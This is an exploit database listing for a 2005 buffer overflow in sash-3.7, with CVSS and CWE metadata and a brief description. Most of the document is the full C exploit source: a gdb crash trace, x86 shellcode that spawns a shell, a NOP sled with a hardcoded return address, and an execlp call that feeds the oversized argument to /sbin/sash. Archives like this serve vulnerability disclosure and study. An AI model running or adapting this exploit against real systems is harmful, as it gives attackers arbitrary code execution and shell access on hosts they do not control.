sash-3.7 buffer overflow in c argyment

vendor:

sash

by:

lammat

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: sash

Affected Version From: sash-3.7

Affected Version To: sash-3.7

Patch Exists: NO

Related CWE:

CPE: a:sash:sash:3.7

Metasploit:

Other Scripts:

Platforms Tested:

2005

sash-3.7 buffer overflow in c argyment

This exploit takes advantage of a buffer overflow vulnerability in sash-3.7. By providing a long string of 'A' characters as an argument to the program, it causes a segmentation fault and allows for arbitrary code execution. The exploit includes a shellcode that spawns a shell.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of sash.

Source

Exploit-DB raw data:

/*  sash-3.7 buffer overflow in c argyment
	written by lammat for practice purposes
		http://grpower.ath.cx
		lammat@iname.com

(gdb) r -c `perl -e 'print "A"x10256'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /sbin/sash -c `perl -e 'print "A"x10256'`
warning: shared library handler failed to enable breakpoint

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

static char shellcode[]=
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";


#define NOP     0x90
#define LEN     10256
#define RET     0xbfff7770

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* Filling the buffer... */

for (i=0;i<LEN;i+=4)
   *(long *)&buffer[i] = retaddr;

for (i=0;i<(LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

memcpy(buffer+i,shellcode,strlen(shellcode));
/* Executing sash */

execlp("/sbin/sash","sash","-c",buffer);
return 0;
}

// milw0rm.com [2005-04-08]